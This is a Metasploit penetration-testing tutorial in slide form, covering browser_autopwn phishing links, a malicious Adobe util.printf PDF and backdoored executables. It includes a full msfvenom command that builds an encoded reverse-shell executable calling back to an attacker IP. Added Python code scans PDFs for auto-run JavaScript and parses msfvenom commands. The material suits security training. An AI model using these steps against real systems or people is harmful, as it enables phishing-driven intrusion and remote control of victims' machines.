Metasploit is a vulnerability and exploitation framework used by security professionals to ease the burden of performing security assessments. It contains modules divided into exploits, auxiliary, payloads, and post exploitation that allow penetration testing functionality. Some techniques demonstrated in the document include browser, PDF, and executable exploitation using Metasploit payloads to gain remote access shells on target systems.
Metasploit Framework is an open-source penetration testing tool used for developing and executing exploit code against a remote target machine; it has the world's largest database of public, tested exploits.
The Metasploit Framework can also be called the 'Swiss Army knife' of penetration testers, as it provides multiple exploits, customization, and easy redevelopment according to the requirements of the system. To secure our systems and protect them from any type of threat, we should perform penetration testing.
2. AGENDA
• Introduction to Metasploit
• History of Metasploit
• Exploit
• Payloads
• Auxiliary
• Network Reconnaissance with Metasploit
• Metasploit Payload
• Meterpreter and Post Exploitation
• Client-side Exploitation – Browser, PDF and EXE
• References
4. Introduction to Metasploit
• Vulnerability and exploitation framework designed to ease the burden on security professionals when it comes to performing security assessments.
• One of the single most useful auditing tools freely available to security professionals today.
• Contains an extensive library of "modules".
• Each module has a function, and they are divided up into "exploits", "auxiliary", "post" (post exploitation), "payloads", "encoders", and "nops".
6. History
• Created by H. D. Moore in 2003 as a portable network tool using Perl.
• In April 2004, with the help of Spoonm, HD released a total rewrite of the project, Metasploit 2.0 (19 exploits and 27 payloads).
• By 2007, the Metasploit Framework had been completely rewritten in Ruby.
• On October 21, 2009, it was acquired by Rapid7.
7. Exploits
• Vectors for penetrating the systems.
• A software program that has been developed to attack an asset by taking advantage of a vulnerability.
• The objective of many exploits is to gain control over an asset.
8. Payloads
• A payload in Metasploit refers to an exploit module.
• Each exploit can be attached with various payloads like reverse or bind shells, the Meterpreter shell, etc.
• A payload is a piece of code to be executed through said exploit.
9. Auxiliary
• The Metasploit Framework includes hundreds of auxiliary modules that perform scanning, fuzzing, sniffing, and much more.
• Although these modules will not give you a shell, they are extremely valuable when conducting a penetration test.
10. Network Reconnaissance with Metasploit
• The foundation for any successful penetration test is solid reconnaissance.
• Gathering enough information regarding the target.
• An example of reconnaissance is using the nmap tool for port scanning and identifying services running on the target system.
11. Metasploit Payloads
• There are mainly three different types of payload modules in the Metasploit Framework: Singles, Stagers, and Stages.
• Singles - self-contained and completely standalone; can be something as simple as adding a user to the target system or running calc.exe.
• Stagers - set up a network connection between the attacker and victim and are designed to be small and reliable.
• Stages - payload components that are downloaded by Stager modules. Stages provide advanced features with no size limits such as Meterpreter, VNC Injection, and the iPhone 'ipwn' shell.
12. Meterpreter and Post Exploitation
• Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime.
• Meterpreter communicates over the stager socket and provides a comprehensive client-side Ruby API.
• Post-exploitation is done after the exploitation in order to maintain control of the compromised system for future use.
• Post-exploitation includes setting up a backdoor to maintain more permanent system access and covering the tracks.
13. Client-side Exploitation
• Client-side attacks require user interaction, such as enticing them to click a link, open a document, or somehow get to your malicious website.
• These types of attacks are often delivered by using cleverly worded emails, sometimes with attachments such as Microsoft Word and PDF documents.
• Often these attacks are used in conjunction with social engineering techniques by way of phishing or spear phishing attacks.
14. Browser Exploitation
• Browser exploitation involves running a browser exploit in order to take advantage of a flaw or vulnerability in an operating system or piece of software, with the intent to breach browser security and alter a user's browser settings without their knowledge.
• Malicious code may exploit ActiveX, HTML, images, Java, JavaScript, and other Web technologies and cause the browser to run arbitrary code.
15. In order to use this attack we have to open the Metasploit Framework and use the browser_autopwn module.
16. Set up the LHOST with your IP address, the SRVPORT with port 80 (otherwise the link that we have to send to the user must be in the format IP:8080) and the URIPATH with / in order to prevent Metasploit from setting up a random URL.
17. Now we can share the link through our email to the client's employees. If any user opens the malicious link, the autopwn module will try all of its loaded exploits in order to see if it can break into the client. If the browser is vulnerable to any of these exploits, a Meterpreter session will open.
18. PDF Exploitation
• Exploiting a system using an attacker-crafted PDF file.
• Mainly targets systems whose PDF reader is vulnerable to some sort of attack like a buffer overflow.
• The PDF is distributed to the victims by social engineering techniques.
• Sometimes the PDF application fails to perform adequate boundary checks on user-supplied data, and thus the system can be attacked using the PDF exploitation technique.
19. We are going to be using the Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Vulnerability.
20. Once we have all the options set the way we want, we run "exploit" to create our malicious file. We will use msfconsole to set up our multi/handler listener.
21. Clicking the file opens Adobe but shows a greyed-out window that never reveals a PDF. Instead, on the attacker's machine a Meterpreter session is opened, and thus we have the shell on the victim system.
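As an added defensive example, not part of the original slides: a small static triage script for the PDF technique described above. It walks the PDF objects, finds JavaScript actions, checks whether they auto-run via /OpenAction or /AA, and flags util.printf calls with an oversized format width; the sample PDF is constructed for the demo and is not a working exploit.

```python
import re
import zlib

# Constructed sample (not a working exploit): a minimal PDF whose /OpenAction
# runs an embedded JavaScript action calling util.printf with a huge width.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj << /Type /Action /S /JavaScript /JS (util.printf("%9999f", 1);) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""
OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj(.*?)endobj", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)

def _object_text(body: bytes) -> bytes:
    """Dictionary text of an object plus its stream, inflated if FlateDecode."""
    m = STREAM_RE.search(body)
    if not m:
        return body
    data = m.group(1)
    if b"/FlateDecode" in body:
        try:
            data = zlib.decompress(data)
        except zlib.error:
            pass  # damaged or unusual stream: fall back to the raw bytes
    return body + data

def scan_pdf(data: bytes) -> dict:
    """Static triage of a PDF for auto-running JavaScript that calls util.printf."""
    objects = {int(n): _object_text(b) for n, b in OBJ_RE.findall(data)}
    js_objs = {n for n, t in objects.items() if b"/JavaScript" in t or b"/JS" in t}
    js_text = b""
    for n in js_objs:
        js_text += objects[n]
        # Follow /JS references so script kept in a separate stream is scanned.
        for ref in re.findall(rb"/JS\s+(\d+)\s+\d+\s+R", objects[n]):
            js_text += objects.get(int(ref), b"")
    auto_run = any(re.search(rb"/(OpenAction|AA)\b", t) for t in objects.values())
    widths = [int(w) for w in re.findall(rb"%(\d+)\.?\d*[df]", js_text)]
    result = {
        "has_javascript": bool(js_objs),
        "auto_run": bool(js_objs) and auto_run,
        "util_printf": b"util.printf" in js_text,
        "max_format_width": max(widths, default=0),
    }
    # Heuristic: util.printf in auto-run JS, or with an absurd width (slide 19).
    result["suspicious"] = result["util_printf"] and (
        result["auto_run"] or result["max_format_width"] > 100)
    return result
```

The heuristic is deliberately coarse: it is a triage signal for mail-gateway or sandbox pipelines, not a replacement for a patched reader.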
22. EXE Exploitation
• Generate an executable from a Metasploit payload in order to target a victim through a malicious executable file.
• If you can get a user to run your payload for you, there is no reason to go through the trouble of exploiting any software.
• Generate a reverse shell payload, execute it on a remote system, and get our shell.
• The best way to do this is to backdoor an executable by embedding it with malicious payloads.
23. msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
Use 'multi/handler', which is a stub that handles exploits launched outside of the framework.
Run 'exploit' for the multi/handler and execute our generated executable on the victim.
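As an added educational example (not code from the slides or from Metasploit itself), this Python helper parses the msfvenom command above, classifies the payload as staged or single from Metasploit's path convention (stage/stager versus stage_stager, which is assumed here from the framework's naming), decodes the -b bad-character list, and checks a byte buffer against it, which is the property the encoder option exists to satisfy. The multi/handler that receives the connection must be configured with the same payload, LHOST and LPORT.

```python
import shlex

# The msfvenom command from the slide, reproduced here as constructed input.
SLIDE_CMD = ('msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp '
             'LHOST=192.168.1.101 LPORT=3333 -b "\\x00" -e x86/shikata_ga_nai '
             '-f exe -o /tmp/1.exe')

FLAGS = {"-a": "arch", "--platform": "platform", "-p": "payload",
         "-b": "badchars", "-e": "encoder", "-f": "format", "-o": "output"}

# Stage names used in Metasploit payload paths: a staged payload is written
# stage/stager, a single joins them with an underscore (shell_reverse_tcp).
STAGES = {"shell", "meterpreter", "vncinject", "dllinject", "upexec"}

def parse_msfvenom(cmd: str) -> dict:
    """Split an msfvenom command line into its flags and KEY=VALUE options."""
    argv = shlex.split(cmd)
    info = {"options": {}}
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok in FLAGS and i + 1 < len(argv):
            info[FLAGS[tok]] = argv[i + 1]
            i += 2
            continue
        if "=" in tok:  # payload option such as LHOST=... or LPORT=...
            key, val = tok.split("=", 1)
            info["options"][key] = val
        i += 1
    return info

def classify_payload(name: str) -> dict:
    """Staged (stager connects back, then pulls the stage) or single payload."""
    parts = name.split("/")
    if len(parts) >= 3 and parts[-2] in STAGES:
        return {"staged": True, "stage": parts[-2], "stager": parts[-1]}
    return {"staged": False, "stage": parts[-1], "stager": None}

def badchar_set(spec: str) -> set:
    """Turn a -b spec such as '\\x00\\x0a' into a set of byte values."""
    return {int(h, 16) for h in spec.split("\\x") if h}

def has_badchars(blob: bytes, bad: set) -> bool:
    """True if any byte of the buffer is in the bad-character set; an encoder
    such as shikata_ga_nai is applied precisely so this check comes out False."""
    return any(b in bad for b in blob)
```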
24. The generated executable can be distributed using some sort of social engineering attack; as soon as the executable is run on the victim system, it presents the attacker with the shell of the victim system.